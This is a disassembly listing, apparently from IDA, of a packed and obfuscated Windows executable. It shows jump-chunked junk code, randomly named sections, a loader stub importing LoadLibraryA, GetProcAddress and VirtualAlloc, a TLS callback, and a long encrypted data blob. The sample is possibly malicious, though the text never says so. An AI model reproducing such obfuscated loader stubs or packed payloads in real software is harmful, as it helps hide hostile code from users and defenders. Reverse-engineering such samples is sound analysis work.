; FUNCTION CHUNK AT 004251BE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00425573 SIZE 00000028 BYTES
; FUNCTION CHUNK AT 00425E5F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426D9D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004285E6 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00429E18 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042EC3C SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042F44B SIZE 0000000B BYTES
call sub_424DF3
test al, al
jz loc_42F44B
jmp loc_426D9D
sub_42FD11 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42FD23: ; DATA XREF: sub_424744+9093�o
push eax
call sub_42B650
retn
; =============== S U B R O U T I N E =======================================
sub_42FD2A proc near ; CODE XREF: sub_42B9CE-7CEC�j
; sub_4253A0:loc_424DFB�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042B60C SIZE 00000003 BYTES
jo sub_42A4F1
push edi
mov edi, ebp
xchg edi, [esp+0]
loc_42FD36: ; CODE XREF: sub_425C2C+4DC7�j
mov ebp, esp
jmp loc_42B60C
sub_42FD2A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CCDD
loc_42FD3D: ; CODE XREF: sub_42CCDD+25DB�j
adc ebx, edx
mov eax, ebp
loc_42FD41: ; CODE XREF: sub_42CCDD:loc_42B720�j
call sub_4272FB
; END OF FUNCTION CHUNK FOR sub_42CCDD
; START OF FUNCTION CHUNK FOR sub_429318
loc_42FD46: ; CODE XREF: sub_429318+5195�j
jmp loc_42A8A2
; END OF FUNCTION CHUNK FOR sub_429318
; ---------------------------------------------------------------------------
loc_42FD4B: ; CODE XREF: _7hdaygc1:0042B81E�j
jmp loc_42F5F8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BD51
loc_42FD50: ; CODE XREF: sub_42BD51-4050�j
jmp loc_42FBA3
; END OF FUNCTION CHUNK FOR sub_42BD51
; ---------------------------------------------------------------------------
loc_42FD55: ; CODE XREF: _7hdaygc1:0042ABB9�j
or esi, ebp
test ecx, 223C0455h
jmp loc_423201
; ---------------------------------------------------------------------------
loc_42FD62: ; CODE XREF: _7hdaygc1:0042A66C�j
jbe loc_423380
; =============== S U B R O U T I N E =======================================
sub_42FD68 proc near ; CODE XREF: sub_429318:loc_42F895�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00425770 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00425839 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C45B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042E13C SIZE 00000014 BYTES
xchg ebx, [esp+0]
pop ebx
xor eax, eax
push ecx
push 90F776BCh
jmp loc_425839
sub_42FD68 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
ror ecx, 6
; START OF FUNCTION CHUNK FOR sub_4268D9
loc_42FD7C: ; CODE XREF: sub_4268D9:loc_42610F�j
add ebx, 70C49E24h
jmp sub_426A39
; END OF FUNCTION CHUNK FOR sub_4268D9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C50D
loc_42FD87: ; CODE XREF: sub_42C50D:loc_42CDE7�j
jz loc_423D3A
jmp loc_42C3FB
; END OF FUNCTION CHUNK FOR sub_42C50D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A94C
loc_42FD92: ; CODE XREF: sub_42A94C+12�j
mov [ebp+var_4], eax
push offset loc_42CC36
jmp loc_42999E
; END OF FUNCTION CHUNK FOR sub_42A94C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ABF7
loc_42FD9F: ; CODE XREF: sub_42ABF7-3C6D�j
jge loc_42D278
xor esi, ecx
pop ecx
sbb ecx, eax
jmp loc_429176
; END OF FUNCTION CHUNK FOR sub_42ABF7
; ---------------------------------------------------------------------------
loc_42FDAF: ; CODE XREF: _7hdaygc1:0042C6DC�j
jz loc_4253CA
sbb ebx, eax
jmp loc_4241D8
; ---------------------------------------------------------------------------
loc_42FDBC: ; CODE XREF: _7hdaygc1:0042DEEF�j
jnz loc_42ACF4
jmp loc_42FBE7
; ---------------------------------------------------------------------------
db 87h
dd 19F4A61h, 24B69B8Ah, 9F7C6411h, 5D80ABh, 8Ah dup(0)
_7hdaygc1 ends
; Section 5. (virtual address 00030000)
; Virtual size : 0000F000 ( 61440.)
; Section size in file : 0000F000 ( 61440.)
; Offset to raw data for section: 00030000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_5qvhby1c segment para public 'CODE' use32
assume cs:_5qvhby1c
;org 430000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
db 0CCh
align 2
dw 3
align 8
dd 0FFFFFFFFh, 3003Ch, 300B4h, 30108h, 0
dd 0FFFFFFFFh, 300E8h, 30104h, 5 dup(0)
dd 6E72656Bh, 32336C65h, 6C6C642Eh, 0
dd 65470000h, 646F4D74h, 48656C75h, 6C646E61h
dword_43005C dd 4165h, 6F4C0000h, 694C6461h, 72617262h, 4179h, 65470000h
; DATA XREF: UPX1:0041A720�o
dd 6F725074h, 64644163h, 73736572h, 0
dd 78450000h, 72507469h, 7365636Fh, 73h, 69560000h, 61757472h
dd 6C6C416Ch, 636Fh, 69560000h, 61757472h, 6572466Ch, 65h
dword_4300B4 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_4300B8 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryAdword_4300BC dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddressdword_4300C0 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; _5qvhby1c:0043C0A4�o ...
dword_4300C4 dd 7C809A51h, 7C809AE4h, 3004Ch, 30060h, 30070h, 30084h
; resolved to->KERNEL32.VirtualAlloc ; DATA XREF: sub_43E113+1E�o
dd 30094h, 300A4h, 0
dd 72657375h, 642E3233h, 6C6Ch, 654D0000h, 67617373h, 786F4265h
dd 41h
dword_430104 dd 7E45058Ah ; resolved to->USER32.MessageBoxA dd 300F4h, 0
TlsDirectory dd 0
TlsEnd_ptr dd 0
TlsIndex_ptr dd offset TlsIndex
TlsCallbacks_ptr dd offset TlsCallbacks
TlsSizeOfZeroFill dd 0
TlsCharacteristics dd 0
TlsIndex dd 0 ; DATA XREF: _5qvhby1c:TlsIndex_ptr�o
TlsCallbacks dd offset TlsCallback_0 ; DATA XREF: _5qvhby1c:TlsCallbacks_ptr�o
dd 0
; ---------------------------------------------------------------------------
push esi
push ecx
mov esi, eax
mov ecx, edx
sub ecx, 4
cld
loc_43013E: ; CODE XREF: _5qvhby1c:00430155�j
lodsb
shr al, 1
cmp al, 74h
jnz short loc_430154
mov eax, [esi]
bswap eax
add eax, ecx
mov [esi], eax
add esi, 4
sub ecx, 4
loc_430154: ; CODE XREF: _5qvhby1c:00430144�j
dec ecx
jg short loc_43013E
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
db 8Bh, 0C0h
dd offset dword_422000
dd 200434Ah, 0
dd 47BC0000h, 111D2091h, 0B00A1208h, 41D80008h, 0DFA49ED0h
dd 0F41630A3h, 13EB709h, 0C84F4287h, 74138925h, 5D84A3C9h
dd 5268E94Ah, 2011F980h, 62020E34h, 15B9A915h, 198C0C1h
dd 0BA303B90h, 608A0022h, 152E8584h, 0A7141AC3h, 0E6528B52h
dd 6244A64Ch, 0AAC5EA21h, 90356825h, 9112A14h, 0CF50B25Bh
dd 402FA6D4h, 28B4EA55h, 0C618A7D3h, 80C01AA9h, 9554AA74h
dd 305D24C1h, 66BEF07Eh, 94CB5738h, 0D15B9C00h, 0E45C7D84h
dd 82074D8Ah, 2DD29DE6h, 0DF63147Bh, 245CA06Ah, 90203764h
dd 1690DDCCh, 76BA516Fh, 0E8764703h, 0CBD20C59h, 5205C3C6h
dd 82D4C9DEh, 4804B48h, 1FBAED06h, 8829270Bh, 0CEE1DD0Ah
dd 0DB8E1BBDh, 916072B4h, 2244D98Eh, 1DDCh, 0
dd 30000000h, 434A0042h, 0CDD7h, 0
dd 20C8F8D1h, 0BE77A3FEh, 4BB37FDDh, 747934A9h, 67A40A36h
dd 7FC87E17h, 7D142244h, 0B7215FCh, 0F03E9AEh, 0AD44EA01h
dd 0B9DB8E8h, 0F71B9A11h, 1C1CF406h, 888467FFh, 568DA0FEh
dd 0E6406717h, 0BADCC332h, 552CA707h, 0C60C1D80h, 3DF0C770h
dd 0FEB95F23h, 7BABA360h, 61D85E70h, 20D5CC70h, 0C066B942h
dd 0C0F3737Ah, 7BB5E00Bh, 79F0587Eh, 36078266h, 435B58C5h
dd 0F6B3A04Bh, 0B4D46E7Ah, 5A6BE442h, 27FDC0FCh, 0E7B38BD4h
dd 0CCBF0EB1h, 0FE2BBF06h, 1FD4807Eh, 0ACD88A2Fh, 0DA1F81D6h
dd 5D434316h, 6BF9809Ch, 340C7A4Eh, 8DA8B61Ch, 0C2632500h
dd 5F95FE62h, 0FD95629Fh, 1C3CD249h, 89325A08h, 58127FA5h
dd 6A768FCCh, 9E9793ADh, 0E07D7448h, 0DD2B1E5Fh, 0C7C8CBC7h
dd 0E2A5FF73h, 8D3D46D6h, 0F3E886Ch, 0C62C03BEh, 0AB6EE202h
dd 20044EF4h, 0A1FA21A9h, 9A7A8C61h, 0EB321143h, 9FE5DADDh
dd 3A1941B0h, 86DB11B8h, 7D7015D5h, 0DD2BE033h, 68E482C5h
dd 4E148DD5h, 0D8EEAE18h, 0A9787972h, 717A3C25h, 0F141E144h
dd 0FC2959E6h, 0B0A51C9Dh, 0A0255A5Fh, 0E80AEAB0h, 0D37562Bh
dd 0B8B82D23h, 0CA0B109Eh, 8C43A6h, 68CA0C37h, 877168F3h
dd 6E6B786Ch, 3CF2498Bh, 0E38CD56Bh, 0FB83BEF9h, 2CC121CAh
dd 0A5A1B883h, 352D2BA2h, 0FD0176E1h, 8813EA1Ch, 6D2C2284h
dd 6980E580h, 0ACD22F59h, 1BDC758Eh, 67D2B45Ah, 6794214Eh
dd 0A942386Dh, 0F05B3091h, 0DAAB7910h, 99E152E9h, 6675EA3Ch
dd 13F3A8D8h, 4DA44FDEh, 3B3DADCh, 3F118B9Ah, 824607EDh
dd 30A6EBB4h, 987F491Bh, 0B7C64846h, 0B10FC161h, 0AAE0A133h
dd 0F9842F47h, 0B7C36802h, 0DF9D0D39h, 0DF9C78B9h, 9AB4B23Eh
dd 551DCDEEh, 611B6901h, 0C0F0BE51h, 0EB19FC4Ch, 0AB4D036h
dd 0CEE968D9h, 44F7456Bh, 0D81F71A8h, 0AF6F305Fh, 0CD098ED6h
dd 0E25C1E34h, 41B352F2h, 52EA6403h, 21884214h, 55312A63h
dd 5A1BA0Dh, 0CB54361Ah, 62B341F7h, 0BED925DAh, 32ED4257h
dd 6CF0A049h, 0E94DB83Eh, 781A92CBh, 497FE540h, 90F4185Dh
dd 70F7E81Fh, 3703C18Ah, 0D77EFF5Bh, 4772681Eh, 7A1A8677h
dd 0F1C9256h, 0D88EC0F8h, 8CF74141h, 4D66A767h, 14FB37DEh
dd 2846870Fh, 2C5130EEh, 0D7565427h, 9B8B3411h, 3A67079h
dd 6FB97230h, 86B96A26h, 3B132901h, 0DD366DB2h, 0C886E91Bh
dd 17ABC0F4h, 6F548B46h, 0A80B68FBh, 0C3C503Ah, 1A983D0Ah
dd 0F60D3DD7h, 0E794AF6h, 0FB6A91BCh, 0FB0B47AEh, 0CB071A69h
dd 0D4DD43C3h, 2992D165h, 607FB035h, 0E1D04F79h, 0FBB47887h
dd 938249BCh, 931B03CEh, 0CDBE70h, 0A629EC82h, 21A3E02Dh
dd 7B420F52h, 3F078586h, 1FB611ECh, 15C3EFC1h, 0BF6AADF2h
dd 55AB2D32h, 0C3337255h, 1B301AD8h, 0FE30FC0Eh, 96361810h
dd 0BEF01AD1h, 899DFCC1h, 0EEFB42C0h, 5BEF9CB4h, 30A70903h
dd 0A489D50h, 0A16C1F12h, 10756E74h, 0EC686D1Fh, 3DFCCAE6h
dd 0A231CFC1h, 0C9BF24D4h, 4C253589h, 0D648BFBEh, 0EFE8E3E0h
dd 3DBE5847h, 6229F908h, 0DE569AA7h, 8B3768B0h, 5F9B31B2h
dd 5A951FE6h, 849C2A0Bh, 9079D5EAh, 0EF0A080Ah, 0DB7F280Ah
dd 0F6B65550h, 1AA170D6h, 830097F6h, 0A6692ADFh, 0E16C75ACh
dd 0FCAF737h, 99F6B83Ch, 252710D1h, 0FC3C3249h, 513BCD6Eh
dd 14DC7086h, 0D327BABEh, 6750EAC0h, 0E2F992FCh, 7F1ED34Fh
dd 0EC50049Dh, 6443D018h, 3F34CB24h, 4E06B795h, 599D28C0h
dd 4C3FC040h, 5B3EE70h, 4857F7B0h, 1F303C75h, 28D9ED2Ch
dd 0C0C1B38h, 0E3289EDCh, 1F0C3F0Dh, 0FE794816h, 0DACA94C6h
dd 5FF72DC5h, 0A9AD030Ch, 0CEAC783Dh, 38BC0093h, 0F571160Bh
dd 14E32631h, 0E2B0E538h, 4DC40C13h, 30063B60h, 0B3DCFE60h
dd 7D122CBFh, 0AA8BC1E0h, 42CD7C2Eh, 5A7B2D7Fh, 3B68295Ch
dd 6E66EF62h, 0B170999Fh, 6B366E3h, 91AEC82Ah, 0F68D141Bh
dd 0F05D2C7Dh, 61BE0F44h, 0F31F791h, 0A886B43Fh, 6E4783E0h
dd 81036D93h, 0D83595B8h, 0A37D259h, 0F7EB00ECh, 0E3218B8Dh
dd 0C0F875B5h, 256DFDE5h, 2F252405h, 7FD034B6h, 755728EEh
dd 7D7EB206h, 3585264Eh, 5E5B539Dh, 0EFF47CC0h, 6B53D51Eh
dd 0F696FB61h, 0ABAB389Ch, 8BC74653h, 702FC0CAh, 44D45732h
dd 767FE64Bh, 0AD26DDDh, 0DA43F1FEh, 0EB40C7E5h, 0A7466CD8h
dd 5752ACh, 185F6177h, 16EA9621h, 2A8B46A5h, 0DA5AF18Dh
dd 564ACFEBh, 15C2EE6h, 1F8CBA62h, 5CA73AFCh, 3FAF9CA9h
dd 7ED5C76Bh, 0D9A6C3F0h, 51692824h, 0F0BE44E9h, 5C15AB00h
dd 99C85F95h, 126D7C6Eh, 0A16A224Dh, 50A2021Ah, 0B5A30B61h
dd 0CAB53A53h, 0BE0B0F1Dh, 0AE2F72A1h, 0C1F538C3h, 527EF0FCh
dd 6ED6D2D1h, 2DE6C739h, 890D5633h, 6D81EFC5h, 0B3D06CE4h
dd 4CE91B47h, 4A544540h, 0E21A450Ah, 0A890781Ah, 82FCF9ABh
dd 38902487h, 0E2361050h, 4CFB1A3Fh, 872DE9Bh, 70DE4848h
dd 7E2F6520h, 52EB0DE1h, 71A19A12h, 97D54406h, 99F1EB16h
dd 8B9541B9h, 1AA741C5h, 0CE383E8Eh, 0B79F739Eh, 9663F1CAh
dd 0B106F7Dh, 1B7703E2h, 0D5DC72ADh, 768FE77Ch, 23F5FB5Ah
dd 0DC0E3BF4h, 234023F7h, 0E1C40888h, 1DB7506Eh, 0B15EACD6h
dd 0DC88BD55h, 0A1B2E2A9h, 0E29833E0h, 5D598460h, 7B3BCC67h
dd 0CA638BE9h, 8DE5E370h, 82986425h, 2F0F0315h, 45FDD649h
dd 57422AEBh, 0E0D8405Bh, 55246514h, 9008780h, 79B1ACCFh
dd 69C0B8AAh, 0CD84AE34h, 86F6ED15h, 29180419h, 0E439A2C6h
dd 933759EFh, 0D68AAEE5h, 7DBFB6C2h, 792DF678h, 218862E9h
dd 90B2E065h, 0D4483D7Ch, 0BCC6E00Fh, 816E255Bh, 8EC8DD70h
dd 0FD985C77h, 0E4D5F607h, 0C734F3E8h, 0BC25F864h, 0F4DC2EF8h
dd 3294F22Ch, 3757EA56h, 89ADC639h, 55AD6079h, 59F23367h
dd 2E2A6AC2h, 2159A61Bh, 0D92202DAh, 47BEEACh, 8F72A362h
dd 0C9DEAEABh, 20B789EDh, 6A0C5663h, 0BEB44837h, 0E8DFC8CAh
dd 0A0914F31h, 3E174E7Fh, 267F2984h, 7078F0A0h, 3C8648BAh
dd 50606DA5h, 484E7F62h, 0B57FD6D4h, 0B6C3435h, 270FA14Fh
dd 2B773754h, 93739E88h, 7F8F0FF7h, 0C2D4B5A2h, 0AF6E8A39h
dd 954CF2B0h, 0FC1EA2AEh, 0D977D40Dh, 0B35890C0h, 0B46F66E3h
dd 1F7F849Bh, 0D3E8C0AEh, 95206D83h, 0C71C0D73h, 1D552949h
dd 24ECAD06h, 0BF68A5D0h, 0B4527AF6h, 78D7582h, 16E897FBh
dd 56769BCEh, 0E2DBB4A9h, 64E38596h, 0D3B6580h, 75BE9330h
dd 159A52DBh, 24E85CD0h, 0CCD440D7h, 73B2DC62h, 306110F2h
dd 0F81595BFh, 3A37B7AAh, 0A0D9C2A5h, 0DC7273ECh, 0EAD4ADFDh
dd 0F1D6562Ch, 0B17ECA98h, 6114CCE0h, 7D169A57h, 0BA52A401h
dd 0E7D2ED68h, 0AA44253Fh, 0DBF28D5Ah, 3C9DE0EFh, 9F7B947Fh
dd 4CF51516h, 0BAE080BFh, 0A59B075Ch, 5B00567h, 3BF4AC35h
dd 851A0D7Fh, 0D79FC22Fh, 0E2BECD32h, 3C6081EEh, 0F59A7932h
dd 1891E59Ch, 5861DBC6h, 783318CCh, 4FB2BB50h, 0C5F040B7h
dd 2461F8Dh, 97DD9BC9h, 0BB141398h, 0CE26CC0Bh, 0F3D5795Fh
dd 0C6D11D85h, 4E2A4063h, 0EEF87DFAh, 3B63B8h, 9CFDB1Eh
dd 53E0B08h, 0AEB6F49h, 4CE4A378h, 7CA45F45h, 0B16BA281h
dd 47C85310h, 0D9E4EF17h, 0B81F42B1h, 8972DEDDh, 0FBDB64C1h
dd 0F13F1689h, 6775B05Ah, 0D7993779h, 0FE5CACC1h, 89E8F9FDh
dd 27FD60ACh, 0B6633FFBh, 7FBBD9C1h, 15A6AEF4h, 0DB70F54h
dd 0AC7BE71Dh, 65CE42EEh
dd 5F6F999h, 0CC07DE9Ah, 8D82CFE0h, 0EFBD06ABh, 31D5F992h
dd 37CAF612h, 97AA920Ah, 51916549h, 0D14096ADh, 50D2DAE2h
dd 9BB92CCAh, 0D6B766FFh, 52C5F4DCh, 30BB0A87h, 0E1CB47FAh
dd 5DE8B393h, 0CB47ACC8h, 6E08C100h, 52A368EFh, 0C6E89387h
dd 836CDEF1h, 40131182h, 46B9781Ah, 18A51754h, 9E4DF6ABh
dd 171B9DF0h, 0EB6081D8h, 9B037EDEh, 8B839ED6h, 378E9DC9h
dd 98248D37h, 0AA8EAFBEh, 0EC2EB5B5h, 48881275h, 3BFC0F3Ah
dd 0BDBDCCA9h, 727BAE56h, 0C317C58Ch, 4DD482CDh, 0AF56571Ah
dd 5D14F81Dh, 8E2B778Eh, 0D504C6D1h, 7B070127h, 2B67AAE2h
dd 0FD04A476h, 9008CFB3h, 0D99EA9DAh, 34BFAB06h, 55D278AEh
dd 6A77322Eh, 0F0E1818h, 336DB034h, 0FE210D0Ah, 180349ECh
dd 7B94E381h, 13E9B883h, 48D654A6h, 7C05B045h, 5032861h
dd 0D5ED401h, 6E0CA142h, 0E3AFB946h, 0E34CD4B3h, 14DD377Ah
dd 593405ACh, 6C1702DEh, 8291354Fh, 17DF099Dh, 64E42071h
dd 5D85ACEEh, 0EEBA1FA2h, 9EA90360h, 0C61B433h, 40E3295Bh
dd 0B46A6AEAh, 573744D3h, 4F9C3438h, 405BBA88h, 91601842h
dd 3B2DDF2Ch, 775A2E14h, 0FA6B9736h, 463F9C53h, 2490EF6Bh
dd 0BD15ABABh, 9CEF41CFh, 51CFCD9h, 4233E1BEh, 46D4DA30h
dd 0F3A95AE3h, 95C93103h, 0FC607EBDh, 0CB67DE7Eh, 0EC20D78Ch
dd 0C7224957h, 0B47F611Eh, 53CE9B57h, 0B2B9595Ch, 78CB7DB9h
dd 2CCD6005h, 7631C4B1h, 0D63C5A98h, 5A38591h, 6926991Fh
dd 160B7C49h, 1AC186C0h, 0F87AA7F9h, 1D102DA8h, 4D783C08h
dd 1A89754Eh, 476AB75Ah, 0BFA60A6h, 0FC7ACCDBh, 7A594E00h
dd 0D2E9A3F5h, 9E0F8206h, 30DAA54Bh, 19E1AA14h, 0A9612864h
dd 72AA8A99h, 0AA792F80h, 0C341E0FDh, 0F8157C75h, 0D26EF165h
dd 198DF41Bh, 0A0EEAE39h, 0B5BC97DFh, 8DBFE464h, 0AA605B6Ah
dd 0FD671C0Dh, 0B1146A86h, 2F8CBD3Ah, 16F801AEh, 0D3B2E2E5h
dd 0BCE63CF6h, 2F44A90Fh, 0C0E26D4Dh, 4ADC2F25h, 0A3EDC16Bh
dd 0A6A0621Eh, 99CDD79Ah, 0D4085CABh, 4D484514h, 0C23325EDh
dd 17BA0843h, 0D4EE103Fh, 0AAC5E4A3h, 5A78462h, 60D5EF42h
dd 1DAB944Dh, 0DB1AEEC3h, 6D501A85h, 0A2B908D7h, 4294124Bh
dd 7FAC43AAh, 70301AC6h, 0DF4BBE1Dh, 4A089C88h, 0CA168FF6h
dd 0BC46FBD2h, 0A54B3BADh, 0B7086D4Eh, 9A0306A9h, 62CEADFEh
dd 5A3CF129h, 0BC22BCB6h, 95695EC8h, 625520DCh, 0B2AE6DB6h
dd 41FAC2C7h, 6E0056D3h, 1687E33Fh, 2E353502h, 0EB68967Ah
dd 0C51F011Ah, 0C0F3ADBCh, 7BD1DE0Fh, 1A3CD3C6h, 3A412DC8h
dd 0B53264FDh, 0B33B924Fh, 70553B45h, 0CD9E8FF4h, 394D7CB7h
dd 0C42BDDD0h, 29E1F5EAh, 1C1E43B0h, 7D5F9F08h, 271AE59Ah
dd 0F106C633h, 0D52DC687h, 0C038DAF4h, 0C3ABC5h, 80AEBE20h
dd 0D3D56940h, 8AAE57F0h, 0B73DCF59h, 10A8DA39h, 5099CCD2h
dd 0B381F8E7h, 0F6FE792Ah, 9C61E894h, 0E945821Ah, 0ACB1040Fh
dd 8FCA1F3Eh, 0BBBA5D73h, 9C31D2D6h, 2B2E556Bh, 47CFD7D1h
dd 38D1C9C5h, 0BCAB139Ch, 0D27BB10h, 5CE55648h, 4E56093Eh
dd 7D5B749Ah, 0A9A35C7h, 54A17B60h, 0A916D407h, 23E05281h
dd 648197F6h, 4EDF9013h, 5B4F87E2h, 0B0B9A05Ch, 732256FAh
dd 3F392B56h, 2C232104h, 0EABF0B45h, 0A6EBA171h, 0BAD19E59h
dd 885024F4h, 5C6852B8h, 297F8612h, 4B3087CCh, 7B64F924h
dd 0FA40D336h, 0EA062566h, 7F8FAEB5h, 0C8D3754Ah, 1A9775ECh
dd 0CB3BD501h, 59FCE667h, 0EFC5DF48h, 84211A9Dh, 1F20AA40h
dd 0B6DB30D7h, 9E0B9B9h, 85545C8Ah, 0A5F68A9Eh, 0DB066D58h
dd 6E0D642h, 93A3C68Ch, 0C20BF22Fh, 533DB73Ah, 4705F837h
dd 0A6683A6Dh, 845AE308h, 0D50D9294h, 256B7C8Dh, 379D1CC6h
dd 0E1AF805Fh, 0A15EABB6h, 9F187E13h, 992D040Eh, 9D251DEh
dd 4FBED80Dh, 38BE2D75h, 0AC4D26F2h, 0FF1F140Fh, 0AC3B845Dh
dd 0B0082A1Fh, 0EF8FFDD3h, 0D2BA411Bh, 14BE65F5h, 0B3372C6Dh
dd 858295BCh, 0C588F74Fh, 1C35A81h, 31B7787Eh, 7BDA710h
dd 182BF475h, 9E0026Eh, 0CE72D367h, 8735E585h, 438BF27Bh
dd 3CAE260Dh, 0A40CA629h, 1B05BA59h, 0B535F611h, 0ECD24301h
dd 1F591551h, 92A4F6Eh, 53D8740Fh, 0AB81E12Ch, 8A52E18Ah
dd 0A03968A9h, 3CA2D37Dh, 8AC187F2h, 0A1D7D517h, 0F768FF77h
dd 0EDA01865h, 0F9342048h, 0E36AF61Ch, 7A22A11Bh, 7CFD0D04h
dd 941F92ADh, 64CA0A47h, 0CD66A551h, 316F28E6h, 25FCD070h
dd 0C954717Ch, 0D06AF635h, 31FDA003h, 5FC684D2h, 27E21C8Dh
dd 0D0DEE07Dh, 0FC0BDFB5h, 6D34E0C0h, 9B5C5470h, 0BB587035h
dd 0A4414056h, 6BB3C0F0h, 4080182Dh, 3F1ACBB0h, 4968DEBBh
dd 37352238h, 0AC4172ABh, 5813B2B9h, 2DC14EC4h, 250A5198h
dd 0A2D751BEh, 7EEC0F1Eh, 535F6D6h, 607FD020h, 0A84E3B70h
dd 0BC5CFCD9h, 905DD460h, 2A568CD6h, 9257850Dh, 0F515E95h
dd 5F409509h, 43D03523h, 1B446F6Fh, 6D6FA221h, 8982DD37h
dd 8AB73373h, 9C0FB612h, 673D2B9Bh, 5A925912h, 5B87C79h
dd 0B4AF333Bh, 0FDD6E1F8h, 6E9E9C34h, 0F906B70Eh, 9C954ED1h
dd 11EBF60Bh, 56F03F39h, 4587D34Ch, 0E17130FFh, 488601E8h
dd 469A4767h, 6A8AF75Bh, 0A6B7858Dh, 0A2FB15E8h, 16049A3Fh
dd 6B07C43Fh, 0B8CA5F1Bh, 2DBED16Ch, 0F4F21E8h, 0F896824Ch
dd 34172D6Dh, 27EFC08Ah, 0F5E0AF86h, 0D58E6EB3h, 0E66E2F15h
dd 67C0FBC3h, 8F51CC51h, 54D302A2h, 8CA545E2h, 0DB8572C0h
dd 0F8B8B2EFh, 0AAD6A62h, 3719CCEFh, 4BC6009h, 27164FF5h
dd 0D207D51Eh, 2B656892h, 9805A2A9h, 0C09218ACh, 2C9045E9h
dd 0B30B50ACh, 1151DF27h, 3EC58F4Ch, 1DB31D51h, 72CA83F1h
dd 0FEBA1588h, 0E9C68F93h, 125A4684h, 55B17F01h, 7956ED53h
dd 0A80ABEAAh, 343F01BCh, 56693065h, 6A9515C4h, 24BB6815h
dd 0AC52BCD3h, 49819781h, 4FEE3D50h, 0B448F61Fh, 6930D2C5h
dd 3DD479FAh, 50146A07h, 6E67C5E0h, 0F1E1B813h, 5A2B3C22h
dd 52F12D95h, 531CA5D5h, 61F89551h, 0DACE5A23h, 2DAA5B52h
dd 0FDF34376h, 9DF6EB44h, 783C083Bh, 4C167EFFh, 0A080AB5h
dd 7FA1C060h, 0C6CAEA43h, 155A7A79h, 0BDBA9F7Dh, 92AE05B8h
dd 1D602AF0h, 5B8D2E18h, 0DE1BB50Bh, 526E3B19h, 8820EEF5h
dd 0B8BA6F40h, 22757743h, 355FE5A1h, 6502CF8Ah, 168E053Fh
dd 7315D78Ch, 7DA9946h, 0C9844E5Fh, 3D0FC268h, 296D38D9h
dd 0B9936493h, 4AD017FCh, 0FC768A01h, 5521DA69h, 5AEACD8h
dd 572A2A7Fh, 6727F897h, 0C77297E6h, 0E402BC2Fh, 7BE72DDDh
dd 0B606E1F3h, 6D0373E1h, 381E5E3Bh, 7D2BFA61h, 0E5D23E80h
dd 754194EFh, 0B17D3580h, 4E55A213h, 99BE292Eh, 7E271496h
dd 0CE3E542Ah, 0CE2AEE06h, 16281E5Eh, 0FE5FF5B4h, 0BD5B5F15h
dd 6A245456h, 7DD234B4h, 1F34BD95h, 169224F9h, 0B7CA15A3h
dd 6065143Bh, 33AA1482h, 6643A13h, 61BE0267h, 395A45BCh
dd 16E5266Ah, 0F28D27E3h, 6A3E07h, 0BCBD9834h, 728FA36Ah
dd 2995DE1Ah, 0B620AE43h, 9012FF80h, 24548FAAh, 5F36C24Dh
dd 7574442Ah, 0DEF88BF7h, 1575EA1Ch, 0E76C2545h, 3F5C1E34h
dd 4964423Dh, 0DB1D500h, 921E6BEDh, 5C44BB0h, 0C0EB70C1h
dd 0AF40228Dh, 19F6C140h, 79EBA76Bh, 28128D46h, 97FAAE1Fh
dd 0B2B15131h, 0A5F7BAE9h, 7039B71Eh, 60674743h, 0E3839A8Bh
dd 0D484D321h, 43C042EDh
dd 195E5057h, 0DFB80ADBh, 2957C5FFh, 55655BD8h, 0F26D48DFh
dd 542D3C48h, 0C814F9FAh, 0CA5486A5h, 5E8E1603h, 4151AEF8h
dd 272E6B5Eh, 0DBD607DDh, 3CA7CFACh, 42510ECBh, 0D372C5FFh
dd 0D01F4E93h, 0D1C882DEh, 1401B9D5h, 0EE143050h, 0A8D58E1Eh
dd 0EFBF874h, 242E7F20h, 3452EEA3h, 0A0081E43h, 4A4194DDh
dd 684CD14Dh, 846F3608h, 66C92484h, 4C7805B1h, 0F055EE4Ah
dd 0B409B3F8h, 0FF0C7AB8h, 0E189445Dh, 79B1306h, 42F8BB2h
dd 0B2607F36h, 0FBD7600Bh, 0B89A909Ah, 0F82DC559h, 0ABFA24h
dd 940B040Eh, 8BFCC494h, 0F61A00D3h, 0AAA285BDh, 0CF364408h
dd 9FCDC531h, 0E12147B3h, 5722E6E7h, 31616593h, 0AA1DEB5Ah
dd 0AF55AADFh, 4F42303h, 0E3A24724h, 0EA2E9EBDh, 2E16C1FAh
dd 3086ECAh, 0DD462FC3h, 0A244AF4Bh, 77DA89FCh, 0F82AB26h
dd 5839ED71h, 0C396C14Bh, 5EF76CD1h, 0CC044E0Eh, 85A2CBA5h
dd 50D9AAD2h, 226A0D1Bh, 1FDDF6BCh, 0A4A11F43h, 1B5AF96Fh
dd 607EEB44h, 4AE00E74h, 0DFE70DDBh, 0C53D0AB4h, 0FD53B474h
dd 33FADFB6h, 7B7759Bh, 6755405Bh, 0A58EB478h, 0E9A137BFh
dd 0FB670E70h, 3DBA39C2h, 0E86E6561h, 1B59A824h, 0EB7D8A07h
dd 980415C3h, 0F46B93E7h, 0A0BDD9D7h, 0A16B7669h, 1349D987h
